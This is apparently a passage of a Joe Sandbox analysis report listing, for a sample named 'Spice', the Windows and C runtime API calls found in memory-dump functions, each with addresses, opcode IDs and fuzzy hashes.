                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                      • Opcode ID: ed62820e7697dacb90f3f4662cab31f15aa1482e12eafd1534fef2b30158eefd
                                                                                                                                                                                                                                      • Instruction ID: 7372f6e628869a729f9cc8181e26cd0693f2c0c22bbad66280a9c28af5847f7f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed62820e7697dacb90f3f4662cab31f15aa1482e12eafd1534fef2b30158eefd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16218835604209AFDB24DFA8DD88EAE77ECFB08364B008129F915DB360DA75EC429764
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E72111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E7214F
                                                                                                                                                                                                                                        • Part of subcall function 00E72111: GetStockObject.GDI32(00000011), ref: 00E72163
                                                                                                                                                                                                                                        • Part of subcall function 00E72111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E7216D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EF7C57
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EF7C64
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EF7C6F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EF7C7E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EF7C8A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                      • Opcode ID: 827081d7c777940a786cc0eac992273166f5a3572c0443af34a3ef866e568d81
                                                                                                                                                                                                                                      • Instruction ID: 3a2ff41a1d3fc330542f42020ec6b75765a8b61d77db95d8d7afc67fc02e8fa4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 827081d7c777940a786cc0eac992273166f5a3572c0443af34a3ef866e568d81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 881186B115021DBEEF159F60CC85EE7BF6DEF08758F015115BB48A6050DB729C21DBA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __init_pointers.LIBCMT ref: 00E99D16
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: EncodePointer.KERNEL32(00000000), ref: 00E933BA
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: __initp_misc_winsig.LIBCMT ref: 00E933D5
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E9A0D0
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E9A0E4
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E9A0F7
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E9A10A
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E9A11D
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E9A130
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E9A143
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E9A156
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E9A169
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E9A17C
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E9A18F
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E9A1A2
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E9A1B5
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E9A1C8
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E9A1DB
                                                                                                                                                                                                                                        • Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E9A1EE
                                                                                                                                                                                                                                      • __mtinitlocks.LIBCMT ref: 00E99D1B
                                                                                                                                                                                                                                      • __mtterm.LIBCMT ref: 00E99D24
                                                                                                                                                                                                                                        • Part of subcall function 00E99D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E99D29,00E97EFD,00F2CD38,00000014), ref: 00E99E86
                                                                                                                                                                                                                                        • Part of subcall function 00E99D8C: _free.LIBCMT ref: 00E99E8D
                                                                                                                                                                                                                                        • Part of subcall function 00E99D8C: DeleteCriticalSection.KERNEL32(00F30C00,?,?,00E99D29,00E97EFD,00F2CD38,00000014), ref: 00E99EAF
                                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00E99D49
                                                                                                                                                                                                                                      • __initptd.LIBCMT ref: 00E99D6B
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E99D72
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3567560977-0
                                                                                                                                                                                                                                      • Opcode ID: 9cfc52cfb652641e61a9f8a899834bd8c8155d09ec0f6d1c51cc32b1a3417932
                                                                                                                                                                                                                                      • Instruction ID: 19125d751984e16a4b62977ed519f87feef6f1bb42c2c1f8adb3afeee7d0152a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cfc52cfb652641e61a9f8a899834bd8c8155d09ec0f6d1c51cc32b1a3417932
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3F09032A4A7156AEF347B7D7C4369A76D4DF81734F21261EF4A4F51D3EF11884141A0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E94282,?), ref: 00E941D3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00E941DA
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 00E941E6
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000001,00E94282,?), ref: 00E94203
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                                                      • API String ID: 3489934621-340411864
                                                                                                                                                                                                                                      • Opcode ID: be1fdce9474d8bca61556ad002e5e8624fc849e23f392a14e7f5eb9201befa1d
                                                                                                                                                                                                                                      • Instruction ID: ff8b88f8647e416bdba75b5f59706aeb54a1281cb2ae8d3aedf1ec80863a8247
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be1fdce9474d8bca61556ad002e5e8624fc849e23f392a14e7f5eb9201befa1d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE01A70691749AFEF102B71ED4DB293AAAB755B1AF604424B401E50F0CFB54085BF10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E941A8), ref: 00E942A8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00E942AF
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 00E942BA
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00E941A8), ref: 00E942D5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                                                      • API String ID: 3489934621-2819208100
                                                                                                                                                                                                                                      • Opcode ID: 308fac71dcf38b12f7aefb7105080ae4e1be594c71671b627efe6467766a587d
                                                                                                                                                                                                                                      • Instruction ID: 8767f272a06d0d1513f40e76d1dd2a856fc622e643985f57b875a35047336476
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 308fac71dcf38b12f7aefb7105080ae4e1be594c71671b627efe6467766a587d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DE0B6B0551718EBEB11AB60AD0DF453AA9B744B16F504115F001E52F0CFB48504FA11
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00E721B8
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E721F9
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00E72221
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00E72350
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E72369
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                                                                                      • Opcode ID: 7f60b7e36471a571b27a86a0cbdedc9e94882f2c84092a1fdee902e278c4fe41
                                                                                                                                                                                                                                      • Instruction ID: 3e8876b05fd9576a0cab517780efde1796774ad9eca4753c37a1e7ccec460b76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f60b7e36471a571b27a86a0cbdedc9e94882f2c84092a1fdee902e278c4fe41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CB15E3990024AEBDF10CFA8C9807EDB7B1FF08714F14E129EE59AB255DB34AA50DB54
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3253778849-0
                                                                                                                                                                                                                                      • Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                                                                                                                                                                      • Instruction ID: 78086dc2bb4f0f703a3bad11f22a8d7c950d9b2c10204e7dced00cd3805fa145
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9761AD7150025AABCF11EF60CC81EFE77A8EF05308F04A55AF9997B292DB359D06CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                        • Part of subcall function 00EF147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF091D
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF095D
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EF0980
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EF09A9
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EF09EC
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF09F9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4046560759-0
                                                                                                                                                                                                                                      • Opcode ID: 304ac84560c1f213d4657c546cd507c46d2ed671b3156a7a6233d4fcba957198
                                                                                                                                                                                                                                      • Instruction ID: 6ceefb724f8a537255b46f66015e0bae732871ac19950bb5667b90b323483468
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 304ac84560c1f213d4657c546cd507c46d2ed671b3156a7a6233d4fcba957198
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5519A31208208AFD714EF24C885E6FBBE8FF84314F04591DF599A72A2EB71E905CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00EF5E38
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00EF5E6F
                                                                                                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EF5E97
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00EF5F06
                                                                                                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00EF5F14
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00EF5F65
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 650687236-0
                                                                                                                                                                                                                                      • Opcode ID: f6b10d11f5590fbeea59679ddccedd9e09b6d13b8607bca9a403a848a13682b5
                                                                                                                                                                                                                                      • Instruction ID: e19862d851ab5648c679ab974f02a0037035d82af322a756d2bcb84cc0052007
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6b10d11f5590fbeea59679ddccedd9e09b6d13b8607bca9a403a848a13682b5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7518F76A01619EFCF11EF64C845ABEB7F5EF58310F105099EA15BB391CB31AE418B90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00ECF6A2
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 00ECF714
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 00ECF76F
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00ECF799
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00ECF7E6
                                                                                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ECF814
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1101466143-0
                                                                                                                                                                                                                                      • Opcode ID: f1e1270aa378d25ed03750a88cfd1ab0f578f20d8271db45341a1c9f961b412a
                                                                                                                                                                                                                                      • Instruction ID: e73b5c725b485c27be8f3656bbe45a8d32ddee13f4a569904e37d5c451b9dce2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1e1270aa378d25ed03750a88cfd1ab0f578f20d8271db45341a1c9f961b412a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6514BB5A00209EFCB14CF58C894EAAB7B9FF4C314B15856AE959EB301D731E911CFA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ED29FF
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2A4A
                                                                                                                                                                                                                                      • IsMenu.USER32(00000000), ref: 00ED2A6A
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00ED2A9E
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00ED2AFC
                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00ED2B2D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3311875123-0
                                                                                                                                                                                                                                      • Opcode ID: 92a792e5affe4fa4776bc31069cacd38fcbef72afc43e401ea4e25c8f74421e4
                                                                                                                                                                                                                                      • Instruction ID: a545b8aae95be0f97917b6f385da03aaf20afdd58a9b26c29beea8a522fc3a8f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92a792e5affe4fa4776bc31069cacd38fcbef72afc43e401ea4e25c8f74421e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70518D70A002099FCF25CF68C888BAEBBF4EF64318F14515FE911AB391D7B09946CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
